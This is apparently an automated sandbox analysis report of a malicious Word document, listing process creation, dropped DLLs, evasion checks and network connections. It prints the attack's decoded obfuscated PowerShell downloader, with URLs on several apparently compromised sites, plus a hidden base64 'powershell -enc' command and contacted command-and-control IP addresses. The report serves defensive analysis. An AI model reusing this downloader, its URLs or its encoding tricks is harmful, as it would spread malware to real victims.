Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00183391 push eax; iretd	10_2_001833AE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00180C18 pushfd ; retf	10_2_00180C19
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001817A1 push ds; iretd	10_2_001817A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_001CFED0 push edx; ret	11_2_001CFFD4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_001B1155 push ecx; ret	11_2_001B1156
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_001B21EC pushad ; ret	11_2_001B2200
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_001B3391 push eax; iretd	11_2_001B33AE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_001B0C18 pushfd ; retf	11_2_001B0C19
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_001B17A1 push ds; iretd	11_2_001B17A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0011FED0 push edx; ret	12_2_0011FFD4

Persistence and Installation Behavior:

Creates processes via WMI

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll

Jump to dropped file

Source: C:\Windows\SysWOW64\rundll32.exe

PE file moved: C:\Windows\SysWOW64\Dgmlr\ngcj.eda

Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Dgmlr\ngcj.eda:Zone.Identifier read attributes \| delete			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Zfrhfthwazxcccc\whpjzcoocbdvfd.agu:Zone.Identifier read attributes \| delete			Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1692

Thread sleep time: -922337203685477s >= -30000s

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Source: powershell.exe, 00000005.00000002.2097432715.00000000003A5000.00000004.00000020.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: rundll32.exe, 00000008.00000002.2121274122.000000000031D000.00000004.00000020.sdmp	Binary or memory string: PPTP00VMware_S

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_1000A823 mov eax, dword ptr fs:[00000030h]

7_2_1000A823

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Memory protected: page execute read | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 115.21.224.117 80	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 195.159.28.230 144	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 162.241.204.233 144	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 69.38.130.14 80	Jump to behavior

Encrypted powershell cmdline option found

Show sources

Source: unknown	Process created: Base64 decoded Sv PB5o ([TYpE]("{2}{1}{5}{3}{0}{6}{4}" -F 'T','EM.I','SYsT','eC','y','o.DIR','OR') ) ; SEt-ITEm vARIaBLe:m7a9 ([typE]("{4}{2}{3}{5}{1}{6}{0}{7}" -f'n','ICEpOINtm','neT','.','sySteM.','sERv','A','aGer') ) ; $Ihv89_g=$M91G + [char](33) + $H23D;$D94M=(('P7'+'2')+'X'); (gET-variaBle pb5o -VA)::"crEaTedi`ReCt`oRY"($HOME + ((('9k'+'tNk')+'2'+'d'+('uhb9'+'kt'+'Gxlh')+('9i'+'a9kt'))."rE`PlaCe"(('9'+'kt'),'\')));$J87H=('S'+('36'+'N')); ( vaRIable M7a9 -VA )::"SEcuriTYp`RoToC`oL" = (('Tl'+'s')+'12');$X22U=('E'+('_'+'_E'));$P27pqe3 = ('E6'+'_R');$F39L=(('Q'+'94')+'W');$Ad1ra8n=$HOME+((('Ki'+'m')+('Nk2d'+'uhb')+'Ki'+'m'+('Gx'+'l')+'h9'+('i'+'aKi')+'m')-RePlace([CHAR]75+[CHAR]105+[CHAR]109),[CHAR]92)+$P27pqe3+'.d' + 'll';$V28U=('C8'+'8K');$Mriqd59='h' + 'tt' + 'p';$Kw3794x=('x '+'['+(' sh'+' ')+('b'+'://cab.my'+'kf')+'n.'+('com'+'/')+'a'+('d'+'min')+'/'+('X/'+'!')+'x'+(' '+'[ s')+'h'+(' b'+':')+('/'+'/bha')+'k'+'ti'+('vrind'+'.'+'com/c')+'g'+('i'+'-bin')+('/'+'JBbb'+'8'+'/!x [ ')+'sh'+(' b'+':')+('/'+'/van'+'ddna')+('bharg'+'a')+'ve'+('.c'+'o')+('m/ass'+'et')+'/W'+('9o'+'/')+'!'+'x '+'[ '+('s'+'h ')+('b:'+'/')+('/ie-'+'b'+'e')+('s'+'t.n')+'e'+('t/o'+'n'+'lin')+'e'+('-'+'timer'+'-')+('k'+'vh')+('xz'+'/i')+'l'+('X'+'L/!x')+(' [ s'+'h ')+('b:'+'/')+'/'+'g'+('oc'+'p'+'hon')+('gth'+'e')+('.com/'+'wp'+'-')+'co'+'nt'+('ent/'+'l')+'M'+('MC'+'/!')+('x '+'[ s')+('h'+' b://'+'ww')+'w'+('.l'+'e')+('t'+'sc')+'om'+'pa'+('r'+'eon')+('l'+'in')+('e'+'.c')+('om/d'+'e')+('.l'+'et')+'sc'+'
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded Sv PB5o ([TYpE]("{2}{1}{5}{3}{0}{6}{4}" -F 'T','EM.I','SYsT','eC','y','o.DIR','OR') ) ; SEt-ITEm vARIaBLe:m7a9 ([typE]("{4}{2}{3}{5}{1}{6}{0}{7}" -f'n','ICEpOINtm','neT','.','sySteM.','sERv','A','aGer') ) ; $Ihv89_g=$M91G + [char](33) + $H23D;$D94M=(('P7'+'2')+'X'); (gET-variaBle pb5o -VA)::"crEaTedi`ReCt`oRY"($HOME + ((('9k'+'tNk')+'2'+'d'+('uhb9'+'kt'+'Gxlh')+('9i'+'a9kt'))."rE`PlaCe"(('9'+'kt'),'\')));$J87H=('S'+('36'+'N')); ( vaRIable M7a9 -VA )::"SEcuriTYp`RoToC`oL" = (('Tl'+'s')+'12');$X22U=('E'+('_'+'_E'));$P27pqe3 = ('E6'+'_R');$F39L=(('Q'+'94')+'W');$Ad1ra8n=$HOME+((('Ki'+'m')+('Nk2d'+'uhb')+'Ki'+'m'+('Gx'+'l')+'h9'+('i'+'aKi')+'m')-RePlace([CHAR]75+[CHAR]105+[CHAR]109),[CHAR]92)+$P27pqe3+'.d' + 'll';$V28U=('C8'+'8K');$Mriqd59='h' + 'tt' + 'p';$Kw3794x=('x '+'['+(' sh'+' ')+('b'+'://cab.my'+'kf')+'n.'+('com'+'/')+'a'+('d'+'min')+'/'+('X/'+'!')+'x'+(' '+'[ s')+'h'+(' b'+':')+('/'+'/bha')+'k'+'ti'+('vrind'+'.'+'com/c')+'g'+('i'+'-bin')+('/'+'JBbb'+'8'+'/!x [ ')+'sh'+(' b'+':')+('/'+'/van'+'ddna')+('bharg'+'a')+'ve'+('.c'+'o')+('m/ass'+'et')+'/W'+('9o'+'/')+'!'+'x '+'[ '+('s'+'h ')+('b:'+'/')+('/ie-'+'b'+'e')+('s'+'t.n')+'e'+('t/o'+'n'+'lin')+'e'+('-'+'timer'+'-')+('k'+'vh')+('xz'+'/i')+'l'+('X'+'L/!x')+(' [ s'+'h ')+('b:'+'/')+'/'+'g'+('oc'+'p'+'hon')+('gth'+'e')+('.com/'+'wp'+'-')+'co'+'nt'+('ent/'+'l')+'M'+('MC'+'/!')+('x '+'[ s')+('h'+' b://'+'ww')+'w'+('.l'+'e')+('t'+'sc')+'om'+'pa'+('r'+'eon')+('l'+'in')+('e'+'.c')+('om/d'+'e')+('.l'+'et')+'sc'+'			Jump to behavior

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAdgAgACAAUABCADUAbwAgACAAKABbAFQAWQBwAEUAXQAoACIAewAyAH0AewAxAH0AewA1AH0AewAzAH0AewAwAH0AewA2AH0AewA0AH0AIgAgAC0ARgAgACcAVAAnACwAJwBFAE0ALgBJACcALAAnAFMAWQBzAFQAJwAsACcAZQBDACcALAAnAHkAJwAsACcAbwAuAEQASQBSACcALAAnAE8AUgAnACkAIAApACAAOwAgACAAUwBFAHQALQBJAFQARQBtACAAdgBBAFIASQBhAEIATABlADoAbQA3AGEAOQAgACgAWwB0AHkAcABFAF0AKAAiAHsANAB9AHsAMgB9AHsAMwB9AHsANQB9AHsAMQB9AHsANgB9AHsAMAB9AHsANwB9ACIAIAAtAGYAJwBuACcALAAnAEkAQwBFAHAATwBJAE4AdABtACcALAAnAG4AZQBUACcALAAnAC4AJwAsACcAcwB5AFMAdABlAE0ALgAnACwAJwBzAEUAUgB2ACcALAAnAEEAJwAsACcAYQBHAGUAcgAnACkAIAApACAAIAA7ACAAIAAkAEkAaAB2ADgAOQBfAGcAPQAkAE0AOQAxAEcAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAEgAMgAzAEQAOwAkAEQAOQA0AE0APQAoACgAJwBQADcAJwArACcAMgAnACkAKwAnAFgAJwApADsAIAAoAGcARQBUAC0AdgBhAHIAaQBhAEIAbABlACAAcABiADUAbwAgAC0AVgBBACkAOgA6ACIAYwByAEUAYQBUAGUAZABpAGAAUgBlAEMAdABgAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwA5AGsAJwArACcAdABOAGsAJwApACsAJwAyACcAKwAnAGQAJwArACgAJwB1AGgAYgA5ACcAKwAnAGsAdAAnACsAJwBHAHgAbABoACcAKQArACgAJwA5AGkAJwArACcAYQA5AGsAdAAnACkAKQAuACIAcgBFAGAAUABsAGEAQwBlACIAKAAoACcAOQAnACsAJwBrAHQAJwApACwAJwBcACcAKQApACkAOwAkAEoAOAA3AEgAPQAoACcAUwAnACsAKAAnADMANgAnACsAJwBOACcAKQApADsAIAAoACAAIAB2AGEAUgBJAGEAYgBsAGUAIAAgAE0ANwBhADkAIAAgAC0AVgBBACAAIAApADoAOgAiAFMARQBjAHUAcgBpAFQAWQBwAGAAUgBvAFQAbwBDAGAAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAMgBVAD0AKAAnAEUAJwArACgAJwBfACcAKwAnAF8ARQAnACkAKQA7ACQAUAAyADcAcABxAGUAMwAgAD0AIAAoACcARQA2ACcAKwAnAF8AUgAnACkAOwAkAEYAMwA5AEwAPQAoACgAJwBRACcAKwAnADkANAAnACkAKwAnAFcAJwApADsAJABBAGQAMQByAGEAOABuAD0AJABIAE8ATQBFACsAKAAoACgAJwBLAGkAJwArACcAbQAnACkAKwAoACcATgBrADIAZAAnACsAJwB1AGgAYgAnACkAKwAnAEsAaQAnACsAJwBtACcAKwAoACcARwB4ACcAKwAnAGwAJwApACsAJwBoADkAJwArACgAJwBpACcAKwAnAGEASwBpACcAKQArACcAbQAnACkALQBSAGUAUABsAGEAYwBlACgAWwBDAEgAQQBSAF0ANwA1ACsAWwBDAEgAQQBSAF0AMQAwADUAKwBbAEMASABBAFIAXQAxADAAOQApACwAWwBDAEgAQQBSAF0AOQAyACkAKwAkAFAAMgA3AHAAcQBlADMAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFYAMgA4AFUAPQAoACcAQwA4ACcAKwAnADgASwAnACkAOwAkAE0AcgBpAHEAZAA1ADkAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABLAHcAMwA3ADkANAB4AD0AKAAnAHgAIAAnACsAJwBbACcAKwAoACcAIABzAGgAJwArACcAIAAnACkAKwAoACcAYgAnACsAJwA6AC8ALwBjAGEAYgAuAG0AeQAnACsAJwBrAGYAJwApACsAJwBuAC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACcAYQAnACsAKAAnAGQAJwArACcAbQBpAG4AJwApACsAJwAvACcAKwAoACcAWAAvACcAKwAnACEAJwApACsAJwB4ACcAKwAoACcAIAAnACsAJwBbACAAcwAnACkAKwAnAGgAJwArACgAJwAgAGIAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvAGIAaABhACcAKQArACcAawAnACsA